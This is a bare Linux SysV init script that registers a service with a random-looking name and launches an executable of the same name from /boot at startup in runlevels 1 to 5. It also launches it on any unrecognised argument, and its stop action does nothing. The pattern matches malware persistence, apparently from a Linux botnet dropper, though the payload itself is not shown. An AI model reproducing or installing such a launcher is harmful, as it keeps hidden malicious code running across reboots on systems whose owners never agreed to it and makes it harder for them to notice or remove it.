#!/bin/sh
# chkconfig: 12345 90 90
# description: bxrpqrhwgi
### BEGIN INIT INFO
# Provides:		bxrpqrhwgi
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	bxrpqrhwgi
### END INIT INFO
case $1 in
start)
	/boot/bxrpqrhwgi
	;;
stop)
	;;
*)
	/boot/bxrpqrhwgi
	;;
esac
